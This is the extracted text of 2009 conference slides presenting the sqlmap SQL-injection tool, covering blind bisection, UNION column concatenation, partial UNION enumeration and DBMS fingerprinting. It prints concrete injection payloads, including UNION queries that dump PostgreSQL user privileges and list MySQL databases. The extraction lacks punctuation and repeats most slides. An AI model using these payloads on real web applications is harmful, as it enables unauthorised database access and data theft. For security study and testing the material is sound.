Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 9
More features
Silent to verbose output messages
Granularity in the users options
Support for concurrent HTTP requests (multi-threading)
Estimated time of arrival
Session save and resume
Options from command line andor configuration file
Integration with Metasploit and w3af
File system read and write access and operating system command execution by providing own queries depending on the session user privileges and back-end DBMS
sqlmap features (22)
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
If it is a SELECT statement sqlmap uses depending on users options the inferential blind or the UNION query technique to retrieve its output
If it is a data manipulation statement a transaction statement or any other valid SQL statement it uses stacked queries to run it if the web application supports them
Give me a SQL shell
Intercon III London ndash January 9 2009 36
Automation vs granularity (12)sqlmap has been developed to make it simple for a busy penetration tester to detect and exploit SQL injection vulnerabilities in web applications
Providing it with a source of targets it can automatically
Detect all possible SQL injections and confirm them
Identify the SQL query syntax
Fingerprint the back-end DBMS
The user does not have to look on the Net for DBMS specific queries then manually inject them to enumerate users password hashes check if the session user is a DBA enumerate table columns datatype etc
There is an option to dump the whole back-end DBMS
Intercon III London ndash January 9 2009 37
Automation vs granularity (22) The tester is a professional he knows what he does and why
There are options to specify
How to compare True and False HTTP responses
A single or more testable parameters
The SQL payload prefix and postfix
A single or a range of entries to dump from a table
A single or multiple columns to dump from a table
Custom SQL statements to run
Options can be specified from both command line andor configuration file
Options are documented in the users manual with examples
Intercon III London ndash January 9 2009 38
Third demo
I get tons of uninteresting mail and system announcements about babies born etc At least a
demo MIGHT have been interestingRichard Stallman
Intercon III London ndash January 9 2009 39
LimitationsCan sqlmap fail to detect or to exploit a SQL injection vulnerability
Yes in some cases mainly because it does not support
SQL injection on SQL clauses other than WHERE
Time based blind SQL injection technique
but I am working on these and others
Intercon III London ndash January 9 2009 40
Want to contributeI am always looking forward to code contributions
Try it find bugs send feature requests review the code and the documentation contribute on the mailing lists
I can provide you with
Details on code internals
Write access to the Subversion repository
Access to the development platform
A beer if you are in London area
Intercon III London ndash January 9 2009 41
Links and contactsHomepage httpsqlmapsourceforgenet
Documentation
httpsqlmapsourceforgenetdevindexhtml
httpsqlmapsourceforgenetdocREADMEpdf
Mailing lists
httpslistssourceforgenetlistslistinfosqlmap-users
httpslistssourceforgenetlistslistinfosqlmap-devel
Personal contacts
E-mail Jabber bernardodamelegmailcom
Blog httpbernardodameleblogspotcom
Intercon III London ndash January 9 2009 42
References OWASP Testing Guide Open Web Application Security Project
Exploit of a Mom xkcd
Deep Blind SQL Injection Ferruh Mavituna (Portcullis Computer Security Ltd)
Microsoft SQL Server sp_replwritetovarbin limited memory overwrite vulnerability Bernhard Mueller (SEC Consult Vulnerability Lab)
Metasploit Framework H D Moore and the Metasploit development team
w3af Andres Riancho and the w3af development team
Data-mining with SQL Injection and Inference David Litchfield (NGS Software)
Advanced SQL Injection Victor Chapela (Sm4rt Security Services)
Python difflib Python Software Foundation
NULL (SQL) Wikipedia
Agent oriented SQL abuse Fernando Russ and Diego Tiscornia (CORE Security)
Insight on UNION query SQL injection Bernardo Damele A G
DBMS Fingerprint Daniele Bellucci (OWASP Backend Security Project)
Intercon III London ndash January 9 2009 43
Questions
Thanks for your attention
- First
- About me
- SQL what (12)
- SQL what (22)
- State of art
- How does it work
- sqlmap
- sqlmap features (12)
- sqlmap features (22)
- Real world
- Dealing with advertisements (13)
- Dealing with advertisements (23)
- Dealing with advertisements (33)
- To NULL or not to NULL (14)
- To NULL or not to NULL (24)
- To NULL or not to NULL (34)
- To NULL or not to NULL (44)
- SQL payload (13)
- SQL payload (23)
- SQL payload (33)
- First demo
- Bypass columns limitation (14)
- Bypass columns limitation (24)
- Bypass columns limitation (34)
- Bypass columns limitation (44)
- Going partial UNION (13)
- Going partial UNION (23)
- Going partial UNION (33)
- DBMS fingerprint (14)
- DBMS fingerprint (24)
- DBMS fingerprint (34)
- DBMS fingerprint (44)
- More on fingerprint
- Second demo
- Give me a SQL shell
- Automation vs granularity (12)
- Automation vs granularity (22)
- Third demo
- Limitations
- Want to contribute
- Links and contacts
- References
- Questions
-
Intercon III London ndash January 9 2009 10
Real world
Have you ever had a dream Neo that you were so sure was real What if you were unable to wake from
that dream How would you know the difference between the dream world and the real world
Morpheus The Matrix
Intercon III London ndash January 9 2009 11
In the real world web applications are often complex
Usually the page content changes at each refresh
They have inline counters advertisement banner clocks etc
Inferential blind SQL injection algorithm is based on the concept that the HTTP responses differ depending on the SQL query
Dealing with advertisements (13)
Intercon III London ndash January 9 2009 12
Obstacle
If the page content does not depend only on the SQL statement and changes at each refresh then the algorithm may not work
Dealing with advertisements (23)
Intercon III London ndash January 9 2009 13
Python library helped to solve this problem for each HTTP response sqlmap calls a function that compares the returned page content with the untouched original page content
Return a measure of the page contents similarity as a float in the range [0 1] with a radio of 3
It works also when the original page is stable but the injected query with a valid condition (True) differs
If the automatic comparison fails the user can provide a string or a regular expression to match on both original and True page contents and to not match on False page contents
Dealing with advertisements (33)
Intercon III London ndash January 9 2009 14
In standard SQL language NULL is allowed as a value for a table column field
In the inferential blind SQL injection technique usually a bisection algorithm is used to identify if the ordinal value of the Nth query output character is higher of a certain ASCII table number this causes the page content to be True or False
The SQL statement used by sqlmap depending on the back-end DBMS is similar to
ASCII(SUBSTR((SQL query) Nth SQL query output char 1)) gt Bisection algorithm number
To NULL or not to NULL (14)
Intercon III London ndash January 9 2009 15
Obstacle
On some DBMS the substring function can not be used on NULL
To NULL or not to NULL (24)
Intercon III London ndash January 9 2009 16
A possible solution for this problem consists in modifying all SQL querys columns explicitly
Casting its output to be a string
Returning value (space) if the casted value is still NULL
Example on MySQL 50 The SQL query to enumerate the column name first entry is
SELECT name FROM testusers LIMIT 0 1
Casted SQL query
SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1
To NULL or not to NULL (34)
Intercon III London ndash January 9 2009 17
The inferential blind SQL injected statement will be then
ORD(MID((SELECT IFNULL(CAST(name AS CHAR(10000)) CHAR(32)) FROM testusers LIMIT 0 1) Nth SQL query output character 1)) gt Bisection algorithm number
URL encoded
ORD28MID2828SELECT20IFNULL28CAST28name20AS20CHAR281000029292C20CHAR2832292920FROM20testusers20LIMIT2002C201292C2012C2012929203E2063
To NULL or not to NULL (44)
Intercon III London ndash January 9 2009 18
You have got an injection point
The injection point is in a SQL statement as follows
SELECT FROM users WHERE id LIKE ((( $_GET[id] ))) LIMIT 0 1
SQL payload (13)
Intercon III London ndash January 9 2009 19
Obstacle
The injection is after a LIKE clause within three parenthesis the statement terminates with a LIMIT clause
SQL payload (23)
Intercon III London ndash January 9 2009 20
In this example the SQL payload that sqlmap identifies is
id=1))) AND (((RaNd LIKE RaNd
In the inferential blind SQL injection algorithm will be
id=1))) AND ORD(MID((SQL query) Nth SQL query output character 1)) gt Bisection algorithm number AND (((RaNd LIKE RaNd
In the UNION query SQL injection technique will be
id=1))) UNION ALL SELECT NULL Concatenated SQL query NULL AND (((RaNd LIKE RaNd
SQL payload (33)
Intercon III London ndash January 9 2009 21
First demo
I did every demo possible to see if the things would do what they were promising they would do
Doug Hall
Intercon III London ndash January 9 2009 22
You have got an injection point
It is vulnerable to UNION query SQL injection
sqlmap detected it for you by NULL bruteforcing or by ORDER BY clause bruteforcing depending on your options
Bypass columns limitation (14)
Intercon III London ndash January 9 2009 23
Obstacle
The number of columns in the web application SELECT statement is lower than the number of columns of your UNION ALL SELECT statement
Bypass columns limitation (24)
Intercon III London ndash January 9 2009 24
A possible solution consists in concatenating your SELECT statement columns in a single output by using the specific DBMS string concatenation operator or function
Example on PostgreSQL 83 to retrieve users privileges
The SQL query to inject is
SELECT usename usecreatedb usesuper usecatupd FROM pg_user
Bypass columns limitation (34)
Intercon III London ndash January 9 2009 25
The injection will be
UNION ALL SELECT NULL CHR(83)||CHR(114)||CHR(108)||CHR(71)||CHR(86)||CHR(116)||COALESCE(CAST(usename AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecreatedb AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usesuper AS CHARACTER(10000)) CHR(32))||CHR(104)||CHR(100)||CHR(122)||CHR(81)||CHR(121)||CHR(90)||COALESCE(CAST(usecatupd AS CHARACTER(10000)) CHR(32))||CHR(75)||CHR(121)||CHR(80)||CHR(65)||CHR(68)||CHR(102) NULL FROM pg_usershyshy
Bypass columns limitation (44)
Intercon III London ndash January 9 2009 26
Obstacle
You have got an injection point vulnerable to UNION query SQL injection Only the query outputs first entry or a range of entries is displayed in the page content
Going partial UNION (13)
Intercon III London ndash January 9 2009 27
sqlmap automatizes a known technique
Changes the parameter value to its negative value causing the original query to produce no output
Inspects and unpack the provided SQL statement
Calculates its output number of entries
Limits it after the UNION ALL SELECT to return one entry at a time
Repeat the previous action N times where N is equal to the number of entries
Going partial UNION (23)
Intercon III London ndash January 9 2009 28
Example on MySQL 41 to enumerate list of databases
The SQL query to inject is
SELECT db FROM mysqldb
sqlmap identified the injection point as being an non-quoted parameter (integer) in the WHERE clause with the equal operator (simple scenario)
The injection will be
id=shy1 UNION ALL SELECT NULL CONCAT(CHAR(1008471698798)IFNULL(CAST(db AS CHAR(10000)) CHAR(32)) CHAR(65831188187116)) NULL FROM mysqldb LIMIT 0 1 AND 6972=6972
Going partial UNION (33)
Intercon III London ndash January 9 2009 29
Back-end DBMS fingerprinting is a mandatory step to go through to take full advantage of a SQL injection flaw
There are a few well known techniques and a few over-looked techniques
sqlmap implements up to four techniques three of these are in use by other tools
The user can force the back-end DBMS software value no HTTP requests are sent to identify the software
By default a basic DBMS fingerprint based on one or two techniques is done only two HTTP requests are sent
The user can choose to perform an extensive DBMS fingerprint based on four techniques numerous (30+) HTTP requests are sent
DBMS fingerprint (14)
Intercon III London ndash January 9 2009 30
The techniques implemented to perform an extensive back-end DBMS fingerprint are
Inband error messages
Banner parsing
SQL dialect
Specific functions static output comparison
On a default installation all of them are reliable
On a hardened installation the last two are reliable
DBMS fingerprint (24)
Intercon III London ndash January 9 2009 31
Example of basic back-end DBMS fingerprint on PostgreSQL 83
The techniques in use are two
The two SQL queries injected to identify it are
AND integerint=integer
SQL dialect
AND COALESCE(integer NULL)=integer
Specific function static output comparison
DBMS fingerprint (34)
Intercon III London ndash January 9 2009 32
Example of extensive back-end DBMS fingerprint on Microsoft SQL Server 2005
The techniques in use are three
The result is
active fingerprint Microsoft SQL Server 2005banner parsing fingerprint Microsoft SQL Server 2005 Service Pack 0 version 9001399html error message fingerprint Microsoft SQL Server
Active fingerprint refers to SQL dialect and specific functions static output comparison
DBMS fingerprint (44)
Intercon III London ndash January 9 2009 33
Fingerprinting is a key step in penetration testing
It is not only about back-end DBMS software
There are techniques and tools to fingerprint the web server the web application technology and their underlying system
What about the back-end DBMS underlying system
sqlmap can fingerprint them without making extra requests
Webapplication server and web application technology by parsing the HTTP response headers (Server X-AspNet-Version X-Powered-By etc) ndash known technique
Back-end DBMS operating system by parsing the DBMS banner ndash over-looked technique
More on fingerprint
Intercon III London ndash January 9 2009 34
Second demo
A demo as in demolish or demonstrationCyclops X-Men Evolution
Intercon III London ndash January 9 2009 35
It might comes in handy sometimes to be able to run your own SQL queries mainly for file system read and write access and operating system command execution
The tool inspects the provided statement
